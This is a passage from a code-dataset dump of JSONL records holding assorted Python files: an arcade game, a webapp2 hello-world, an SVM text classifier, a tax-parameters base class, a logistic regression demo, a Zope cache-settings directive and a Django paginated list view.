"wangyiyun.search_list.one_song_comment.song_comment", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 39, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 43, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.StaleElementReferenceException", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "522576482", "text": "import arcade\nimport random\n\nfrom Source.Unit.unit import Tower, Enemy\n\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSPRITE_SCALING_COIN = 0.2\nSPRITE_SCALING_PLAYER = 0.6\nCOIN_COUNT = 30\nMOVEMENT_SPEED = 5\n\n\nclass MyGame(arcade.Window):\n \"\"\" Главный класс приложения. \"\"\"\n\n def __init__(self, width, height):\n super().__init__(width, height)\n\n arcade.set_background_color(arcade.color.AMAZON)\n self.all_sprites_list = None\n self.coin_list = None\n\n # Set up the player\n self.score = 0\n self.player_sprite = None\n self.physics_engine = None\n\n\n def get_coin(self, count: int, coin_list: list):\n for i in range(count):\n # Создать инстанс монеток\n # и их изображение из kenney.nl\n coin = arcade.Sprite(\"images/chicken.png\", SPRITE_SCALING_COIN)\n\n # Задать положение монеток\n coin.center_x = random.randrange(SCREEN_WIDTH)\n coin.center_y = random.randrange(SCREEN_HEIGHT)\n\n # Добавить монетку к списку \n coin_list.append(coin)\n\n def setup(self):\n # Настроить игру здесь\n self.player_list = arcade.SpriteList()\n self.coin_list = arcade.SpriteList()\n\n self.player_sprite = Tower(100, 10, 30, \"images/character/jedi.png\", SPRITE_SCALING_PLAYER)\n self.player_sprite.center_x = 50 # Стартовая позиция\n self.player_sprite.center_y = 50\n self.player_list.append(self.player_sprite)\n\n self.get_coin(COIN_COUNT, self.coin_list)\n\n def on_draw(self):\n \"\"\" Отрендерить этот экран. \"\"\"\n arcade.start_render()\n # Здесь код рисунка\n self.coin_list.draw()\n self.player_list.draw()\n\n output = f\"Score: {self.score}\"\n arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)\n\n def on_mouse_motion(self, x, y, dx, dy):\n \"\"\" Handle Mouse Motion \"\"\"\n\n # Move the center of the player sprite to match the mouse x, y\n self.player_sprite.center_x = x\n self.player_sprite.center_y = y\n\n\n def on_key_press(self, key, modifiers):\n \"\"\"Called whenever a key is pressed. \"\"\"\n\n if key == arcade.key.UP:\n self.player_sprite.change_y = MOVEMENT_SPEED\n elif key == arcade.key.DOWN:\n self.player_sprite.change_y = -MOVEMENT_SPEED\n elif key == arcade.key.LEFT:\n self.player_sprite.change_x = -MOVEMENT_SPEED\n elif key == arcade.key.RIGHT:\n self.player_sprite.change_x = MOVEMENT_SPEED\n\n def on_key_release(self, key, modifiers):\n \"\"\"Called when the user releases a key. \"\"\"\n\n if key == arcade.key.UP or key == arcade.key.DOWN:\n self.player_sprite.change_y = 0\n elif key == arcade.key.LEFT or key == arcade.key.RIGHT:\n self.player_sprite.change_x = 0\n\n def update(self, delta_time):\n \"\"\" Здесь вся игровая логика и логика перемещения.\"\"\"\n self.coin_list.update()\n coins_hit_list = arcade.check_for_collision_with_list(self.player_sprite, \n self.coin_list)\n # self.physics_engine.update()\n for coin in coins_hit_list:\n coin.kill()\n self.score += 1\n if len(self.coin_list) == 0:\n self.get_coin(COIN_COUNT * 2, self.coin_list)\n if self.score > 20:\n self.player_sprite.level_up('images/goat.png', 5)\n\n\ndef main():\n game = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)\n game.setup()\n arcade.run()\n\n\nif __name__ == \"__main__\":\n main()", "sub_path": "game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 3764, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "arcade.Window", "line_number": 15, "usage_type": "attribute"}, {"api_name": "arcade.set_background_color", "line_number": 21, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 21, "usage_type": "attribute"}, {"api_name": "arcade.Sprite", "line_number": 35, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 38, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 39, "usage_type": "call"}, {"api_name": "arcade.SpriteList", "line_number": 46, "usage_type": "call"}, {"api_name": "arcade.SpriteList", "line_number": 47, "usage_type": "call"}, {"api_name": "Source.Unit.unit.Tower", "line_number": 49, "usage_type": "call"}, {"api_name": "arcade.start_render", "line_number": 58, "usage_type": "call"}, {"api_name": "arcade.draw_text", "line_number": 64, "usage_type": "call"}, {"api_name": "arcade.color", "line_number": 64, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 77, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 81, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 83, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 89, "usage_type": "attribute"}, {"api_name": "arcade.key", "line_number": 91, "usage_type": "attribute"}, {"api_name": "arcade.check_for_collision_with_list", "line_number": 97, "usage_type": "call"}, {"api_name": "arcade.run", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "560072494", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Created by Kristen on 1/3/16.\"\"\"\nimport webapp2\nclass MainPage(webapp2.RequestHandler):\n\tdef get(self):\n\t\tself.response.headers['Content-Type'] = 'text/plain'\n\t\tself.response.write('Hello world!')\n\napp = webapp2.WSGIApplication([('/', MainPage)], debug=True)\n", "sub_path": "appengine/helloworld.py", "file_name": "helloworld.py", "file_ext": "py", "file_size_in_byte": 308, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "webapp2.RequestHandler", "line_number": 5, "usage_type": "attribute"}, {"api_name": "webapp2.WSGIApplication", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "511488955", "text": "import numpy as np\n\nfrom sklearn.svm import LinearSVC\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ndef get_train(stopword):\n\tdatas_train = []\n\ttargets_train = []\n\tfor i in range(1, 14, 1):\n\t\tfor line in open(\"/home/nhatnor123/Desktop/gitlabVC/classify_data/train/\" + str(i) + \".txt\", encoding=\"utf-8\"):\n\t\t\ttargets_train.append(i)\n\t\t\tdoc = []\n\t\t\tfor word in line.lower().split(\" \"):\n\t\t\t\tif (not word in stopword) and (not word.isdigit()):\n\t\t\t\t\tdoc.append(word)\n\t\t\tdatas_train.append(' '.join(doc))\n\ttargets_train = np.asarray(targets_train)\n\treturn datas_train, targets_train\n\n\ndef get_test(stopword):\n\tdatas_test = []\n\ttargets_test = []\n\n\tfor line in open(\"/home/nhatnor123/Desktop/gitlabVC/classify_data/test/data.txt\", encoding=\"utf-8\"):\n\t\tdoc = []\n\t\tfor word in line.lower().split(\" \"):\n\t\t\tif (not word in stopword) and (not word.isdigit()):\n\t\t\t\tdoc.append(word)\n\t\tdatas_test.append(' '.join(doc))\n\n\tfor line in open(\"/home/nhatnor123/Desktop/gitlabVC/classify_data/test/label.txt\", encoding=\"utf-8\"):\n\t\ttargets_test.append(int(line))\n\ttargets_test = np.asarray(targets_test)\n\treturn datas_test, targets_test\n\n\ndef svm_core(datas_train, targets_train, datas_test, targets_test):\n\tvectorizer = TfidfVectorizer(min_df=0.005, max_df=0.8)\n\tvectors_train = vectorizer.fit_transform(datas_train)\n\tvectors_test = vectorizer.transform(datas_test)\n\t\n\tscoreLSVC = LinearSVC(C=2.2).fit(vectors_train, targets_train).score(vectors_test, targets_test)\n\n\tprint(\"--------- classify_data ---------\")\n\tprint(\"Train : \", vectors_train.shape[0])\n\tprint(\"Test : \", vectors_test.shape[0])\n\n\tprint(\"----- SVM -----\")\n\tprint(\"ScoreLSVC :\", 100 * scoreLSVC, \"%\")\n\n\n#main\nstopword = open(\"/home/nhatnor123/Desktop/gitlabVC/Tuan 1/stopwords.txt\", encoding=\"utf-8\").read().split(\"\\n\")\ndata_train, target_train = get_train(stopword)\ndata_test, target_test = get_test(stopword)\nsvm_core(data_train, target_train, data_test, target_test)", "sub_path": "Tuan 1/NavieBayes/SVM.py", "file_name": "SVM.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.asarray", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 39, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "243798543", "text": "\"\"\"\nTax-Calculator abstract base parameters class.\n\"\"\"\n# CODING-STYLE CHECKS:\n# pep8 parameters.py\n\nimport os\nimport json\nimport six\nimport abc\nimport ast\nimport collections as collect\nimport numpy as np\n\n\nclass ParametersBase(object):\n \"\"\"\n Inherit from this class for OG-USA parameter classes. Override this\n __init__ method and DEFAULTS_FILENAME.\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n DEFAULTS_FILENAME = None\n\n @classmethod\n def default_data(cls, metadata=False):\n \"\"\"\n Return parameter data read from the subclass's json file.\n\n Parameters\n ----------\n metadata: boolean\n\n start_year: int or None\n\n Returns\n -------\n params: dictionary of data\n \"\"\"\n params = cls._params_dict_from_json_file()\n # return different data from params dict depending on metadata value\n if metadata:\n return params\n else:\n return {name: data['value'] for name, data in params.items()}\n\n def __init__(self):\n pass\n\n def initialize(self, ):\n \"\"\"\n Called from subclass __init__ function.\n\n Added expand=True option to turn off expansion of arrays\n \"\"\"\n self.set_default_vals()\n\n def set_default_vals(self, known_years=999999):\n \"\"\"\n Called by initialize method and from some subclass methods.\n \"\"\"\n if hasattr(self, '_vals'):\n for name, data in self._vals.items():\n intg_val = data.get('integer_value', None)\n bool_val = data.get('boolean_value', None)\n values = data.get('value', None)\n if values:\n setattr(self, name,\n self._expand_array(values, intg_val, bool_val))\n\n # ----- begin private methods of ParametersBase class -----\n\n @classmethod\n def _params_dict_from_json_file(cls):\n \"\"\"\n Read DEFAULTS_FILENAME file and return complete dictionary.\n Parameters\n ----------\n nothing: void\n Returns\n -------\n params: dictionary\n containing complete contents of DEFAULTS_FILENAME file.\n \"\"\"\n if cls.DEFAULTS_FILENAME is None:\n msg = 'DEFAULTS_FILENAME must be overridden by inheriting class'\n raise NotImplementedError(msg)\n path = os.path.join(os.path.abspath(os.path.dirname(__file__)),\n cls.DEFAULTS_FILENAME)\n if os.path.exists(path):\n with open(path) as pfile:\n params_dict = json.load(pfile,\n object_pairs_hook=collect.OrderedDict)\n return params_dict\n\n def _update(self, mods):\n \"\"\"\n Private method used by public implement_reform and update_* methods\n in inheriting classes.\n Parameters\n ----------\n mods: dictionary containing a parameter:value pairs\n Raises\n ------\n ValueError:\n if mods is not a dict.\n Returns\n -------\n nothing: void\n Notes\n -----\n \"\"\"\n # check YEAR value in the single YEAR:MODS dictionary parameter\n if not isinstance(mods, dict):\n msg = 'mods is not a dictionary'\n raise ValueError(msg)\n all_names = set(mods.keys()) # no duplicate keys in a dict\n used_names = set() # set of used parameter names in MODS dict\n for name, values in mods.items():\n intg_val = self._vals[name].get('integer_value', None)\n bool_val = self._vals[name].get('boolean_value', None)\n # set post-reform values of parameter with name\n used_names.add(name)\n cval = getattr(self, name, None)\n nval = self._expand_array(values, intg_val, bool_val)\n cval[0] = nval\n # confirm that all names have been used\n assert len(used_names) == len(all_names)\n\n @staticmethod\n def _expand_array(x, x_int, x_bool):\n \"\"\"\n Private method called only within this abstract base class.\n Dispatch to either _expand_1D or _expand_2D given dimension of x.\n Parameters\n ----------\n x : value to expand\n x must be either a scalar list or a 1D numpy array, or\n x must be either a list of scalar lists or a 2D numpy array\n x_int : boolean\n True implies x has dtype=np.int8;\n False implies x has dtype=np.float64 or dtype=np.bool_\n x_bool : boolean\n True implies x has dtype=np.bool_;\n False implies x has dtype=np.float64 or dtype=np.int8\n Returns\n -------\n expanded numpy array with specified dtype\n \"\"\"\n assert not (x_int and x_bool)\n if not isinstance(x, list) and not isinstance(x, np.ndarray):\n msg = '_expand_array expects x to be a list or numpy array'\n raise ValueError(msg)\n if isinstance(x, list):\n if x_int:\n x = np.array(x, np.int8)\n elif x_bool:\n x = np.array(x, np.bool_)\n else:\n x = np.array(x, np.float64)\n return x\n\n OP_DICT = {\n '+': lambda pvalue, val: pvalue + val,\n '-': lambda pvalue, val: pvalue - val,\n '*': lambda pvalue, val: pvalue * val,\n '/': lambda pvalue, val: pvalue / val if val > 0 else 'ERROR: Cannot divide by zero',\n }\n\n def simple_eval(self, param_string):\n \"\"\"\n Parses `param_string` and returns result. `param_string can be either:\n 1. `param_name op scalar` -- this will be parsed into param, op, and scalar\n where `op` is a key in `OP_DICT`. The corresponding function is\n applied to the parameter value and the scalar value.\n 2. `param_name` -- simply return the parameter value that is retrieved\n from the object\n\n Parameters\n ----------\n param_string : string of form `param op scalar` or `param`\n\n Returns\n -------\n float used for validation\n \"\"\"\n pieces = param_string.split(' ')\n validate_against = pieces[0]\n # param_string is of the form 'param_name op scalar'\n if len(pieces) > 1:\n op = pieces[1]\n # parse string to python type (i.e. str --> int, float, bool)\n scalar = ast.literal_eval(pieces[2])\n value_against = getattr(self, validate_against)\n assert value_against is not None and isinstance(value_against, (int, float, np.ndarray))\n assert op in ParametersBase.OP_DICT\n return ParametersBase.OP_DICT[op](value_against, scalar)\n else:\n # vval is just the parameter name\n return getattr(self, param_string)\n", "sub_path": "pb_interface/parametersbase.py", "file_name": "parametersbase.py", "file_ext": "py", "file_size_in_byte": 6843, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "abc.ABCMeta", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 92, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 156, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.bool_", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 160, "usage_type": "attribute"}, {"api_name": "ast.literal_eval", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 195, "usage_type": "attribute"}]} +{"seq_id": "411046825", "text": "# -*- coding: utf-8 -*-\n# @Date : 2020/5/21\n# @Author: Luokun\n# @Email : olooook@outlook.com\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass LogisticRegression:\n \"\"\"\n Logistic regression classifier(逻辑斯蒂回归分类器)\n \"\"\"\n\n def __init__(self, input_dim: int, lr: float):\n self.weights = np.random.randn(input_dim + 1) # 随机初始化参数\n self.lr = lr # 学习率\n\n def fit(self, X: np.ndarray, Y: np.ndarray):\n x_pad = self._pad(X) # 为X填充1作为偏置\n pred = self._sigmoid(x_pad @ self.weights) # 计算预测值\n grad = x_pad.T @ (pred - Y) / len(pred) # 计算梯度\n self.weights -= self.lr * grad # 沿负梯度更新参数\n\n def __call__(self, X: np.ndarray):\n x_pad = self._pad(X) # 为X填充1作为偏置\n pred = self._sigmoid(x_pad @ self.weights) # 计算预测值\n return np.where(pred > 0.5, 1, 0) # 将(0, 1)之间分布的概率转化为{0, 1}标签\n\n @staticmethod\n def _pad(x):\n return np.concatenate([x, np.ones([len(x), 1])], axis=1)\n\n @staticmethod\n def _sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\ndef load_data():\n x = np.stack([np.random.randn(500, 2) + np.array([1, -1]),\n np.random.randn(500, 2) + np.array([-1, 1])])\n y = np.stack([np.full([500], 0), np.full([500], 1)])\n return x, y\n\n\ndef train_logistic_regression(model, x, y, epochs, batch_size=32):\n indices = np.arange(len(x))\n for _ in range(epochs):\n np.random.shuffle(indices)\n for i in range(batch_size, len(x) + 1, batch_size):\n model.fit(x[indices[(i - batch_size):i]], y[indices[(i - batch_size):i]])\n\n\nif __name__ == '__main__':\n x, y = load_data()\n plt.figure(figsize=[12, 6])\n plt.subplot(1, 2, 1)\n plt.title('Real')\n plt.xlim(-5, 5)\n plt.ylim(-5, 5)\n plt.scatter(x[0, :, 0], x[0, :, 1], color='r', marker='.')\n plt.scatter(x[1, :, 0], x[1, :, 1], color='g', marker='.')\n\n x, y = x.reshape(-1, 2), y.flatten()\n logistic_regression = LogisticRegression(2, lr=1e-3)\n train_logistic_regression(logistic_regression, x, y, epochs=500)\n pred = logistic_regression(x)\n acc = np.sum(pred == y) / len(pred)\n print(f'Accuracy = {100 * acc:.2f}%')\n\n x0, x1 = x[pred == 0], x[pred == 1]\n plt.subplot(1, 2, 2)\n plt.title('Pred')\n plt.xlim(-5, 5)\n plt.ylim(-5, 5)\n plt.scatter(x0[:, 0], x0[:, 1], color='r', marker='.')\n plt.scatter(x1[:, 0], x1[:, 1], color='g', marker='.')\n\n w = logistic_regression.weights\n a, b = - w[0] / w[1], - w[2] / w[1]\n line_x = np.linspace(-5, 5, 100)\n line_y = a * line_x + b\n plt.plot(line_x, line_y, color='b', linewidth=1)\n plt.show()\n", "sub_path": "LogisticRegression/logistic_regression.py", "file_name": "logistic_regression.py", "file_ext": "py", "file_size_in_byte": 2732, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.random.randn", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "90228805", "text": "##############################################################################\n#\n# Copyright (c) 2006-2007 Lovely Systems and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"\n$Id$\n\"\"\"\n__docformat__ = \"reStructuredText\"\n\nimport os\n\nfrom zope import interface\nfrom zope import component\nfrom zope import schema\n\nfrom zope.component import zcml\nfrom zope.component.zcml import handler\nfrom zope.proxy import removeAllProxies\nfrom zope.configuration.fields import GlobalObject\nfrom zope.publisher.interfaces.browser import IDefaultBrowserLayer\n\nfrom interfaces import IResponseCacheSettings\nfrom view import ResponseCacheSettings\n\nfrom zope.i18nmessageid import MessageFactory\n_ = MessageFactory('lovely.responseheader')\n\n\nclass ICacheSettingsDirective(interface.Interface):\n \"\"\"Parameters for the cache settings directive.\"\"\"\n\n for_ = GlobalObject(\n title = _(u'for'),\n description = _(u'The interface to register the settings for'),\n required = True,\n )\n\n layer = GlobalObject(\n title = _(u'Layer'),\n description = _(u'The layer for which the settings should be used'),\n required = False,\n default=IDefaultBrowserLayer,\n )\n\n class_ = GlobalObject(\n title = _(u'class'),\n description = _(u'The class to use for the settings'),\n required = False,\n )\n\n cacheName = schema.TextLine(\n title = _(u'Cachename'),\n required=False,\n default=u'',\n )\n\n key = schema.BytesLine(\n title = _(u'Cachekey'),\n required = False,\n )\n\n lifetime = schema.TextLine(\n title = _(u'Lifetime'),\n description = _(u\"\"\"\n The lifetime of the cache entry in seconds.\n The content of this filed will be evaluated. It is possible to\n give the value in the form '11*60*60'.\n \"\"\"),\n required = False,\n default = None,\n )\n\n dependOnContext = schema.Bool(\n title = _(u'Depend On Context'),\n description = _(\"\"\"\n The dependency will always contain the context of the view.\n \"\"\"),\n required = False,\n default = False,\n )\n\n\nclass FactoryCacheSettings(ResponseCacheSettings):\n\n def __init__(self, context, request):\n super(FactoryCacheSettings, self).__init__(context, request)\n self.dependOnContext = False\n\n @property\n def dependencies(self):\n if self.dependOnContext:\n view = removeAllProxies(self.context)\n return [removeAllProxies(view.context)]\n return []\n\n\nclass CacheSettingsFactory(object):\n\n def __init__(self,\n cacheName, key, lifetime, dependOnContext):\n self.cacheName = cacheName\n self.key = key\n self.lifetime = lifetime\n self.dependOnContext = dependOnContext\n\n def __call__(self, context, request):\n settings = FactoryCacheSettings(context, request)\n if self.cacheName is not None:\n settings.cacheName = self.cacheName\n if self.key is not None:\n settings.key = self.key\n if self.lifetime is not None:\n settings.lifetime = self.lifetime\n settings.dependOnContext = self.dependOnContext\n return settings\n\n\ndef cacheSettingsDirective(_context,\n for_,\n layer=IDefaultBrowserLayer,\n class_=None,\n cacheName=None,\n key=None,\n lifetime=None,\n dependOnContext=False,\n ):\n if class_:\n cdict = {}\n if lifetime is not None:\n cdict['lifetime'] = eval(lifetime)\n if cacheName is not None:\n cdict['cacheName'] = cacheName\n if key is not None:\n cdict['key'] = key\n if dependOnContext is not None:\n cdict['dependOnContext'] = dependOnContext\n new_class = type(class_.__name__, (class_,), cdict)\n else:\n if lifetime is not None:\n lifetime=eval(lifetime)\n new_class = CacheSettingsFactory(\n cacheName, key, lifetime, dependOnContext)\n _context.action(\n discriminator = (\n 'cacheSettings',\n layer,\n for_,\n ),\n callable = handler,\n args = ('registerAdapter',\n new_class,\n (for_, layer),\n IResponseCacheSettings,\n '',\n _context.info),\n )\n\n", "sub_path": "lovely.responsecache/tags/0.2.4/src/lovely/responsecache/zcml.py", "file_name": "zcml.py", "file_ext": "py", "file_size_in_byte": 5171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "zope.i18nmessageid.MessageFactory", "line_number": 35, "usage_type": "call"}, {"api_name": "zope.interface.Interface", "line_number": 38, "usage_type": "attribute"}, {"api_name": "zope.interface", "line_number": 38, "usage_type": "name"}, {"api_name": "zope.configuration.fields.GlobalObject", "line_number": 41, "usage_type": "call"}, {"api_name": "zope.configuration.fields.GlobalObject", "line_number": 47, "usage_type": "call"}, {"api_name": "zope.publisher.interfaces.browser.IDefaultBrowserLayer", "line_number": 51, "usage_type": "name"}, {"api_name": "zope.configuration.fields.GlobalObject", "line_number": 54, "usage_type": "call"}, {"api_name": "zope.schema.TextLine", "line_number": 60, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 60, "usage_type": "name"}, {"api_name": "zope.schema.BytesLine", "line_number": 66, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 66, "usage_type": "name"}, {"api_name": "zope.schema.TextLine", "line_number": 71, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 71, "usage_type": "name"}, {"api_name": "zope.schema.Bool", "line_number": 82, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 82, "usage_type": "name"}, {"api_name": "view.ResponseCacheSettings", "line_number": 92, "usage_type": "name"}, {"api_name": "zope.proxy.removeAllProxies", "line_number": 101, "usage_type": "call"}, {"api_name": "zope.proxy.removeAllProxies", "line_number": 102, "usage_type": "call"}, {"api_name": "view.context", "line_number": 102, "usage_type": "attribute"}, {"api_name": "zope.publisher.interfaces.browser.IDefaultBrowserLayer", "line_number": 129, "usage_type": "name"}, {"api_name": "zope.component.zcml.handler", "line_number": 158, "usage_type": "name"}, {"api_name": "interfaces.IResponseCacheSettings", "line_number": 162, "usage_type": "name"}]} +{"seq_id": "439994684", "text": "from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect \nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .models import acupoint\nfrom django.utils import timezone\nfrom .acupoint import *\nfrom django.views.generic import ListView\nfrom django.db.models import Q\n\nclass IndexView(ListView):\n model = acupoint\n template_name = 'blog/index.html'\n context_object_name = 'post_list'\n paginate_by = 5\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n paginator = context.get('paginator')\n page = context.get('page_obj')\n is_paginated = context.get('is_paginated')\n pagination_data = self.pagination_data(paginator, page, is_paginated)\n context.update(pagination_data)\n return context\n\n def pagination_data(self, paginator, page, is_paginated):\n if not is_paginated:\n # 如果没有分页,则无需显示分页导航条,不用任何分页导航条的数据,因此返回一个空的字典\n return {}\n\n left = []\n right = []\n left_has_more = False\n right_has_more = False\n\n first = False\n last = False\n\n page_number = page.number\n\n total_pages = paginator.num_pages\n\n page_range = paginator.page_range\n\n if page_number == 1:\n right = page_range[page_number:page_number + 2]\n\n if right[-1] < total_pages - 1:\n right_has_more = True\n\n if right[-1] < total_pages:\n last = True\n\n elif page_number == total_pages:\n left = page_range[(page_number - 3) if (page_number - 3) > 0 else 0:page_number - 1]\n\n if left[0] > 2:\n left_has_more = True\n\n if left[0] > 1:\n first = True\n else:\n left = page_range[(page_number - 3) if (page_number - 3) > 0 else 0:page_number - 1]\n right = page_range[page_number:page_number + 2]\n if right[-1] < total_pages - 1:\n right_has_more = True\n if right[-1] < total_pages:\n last 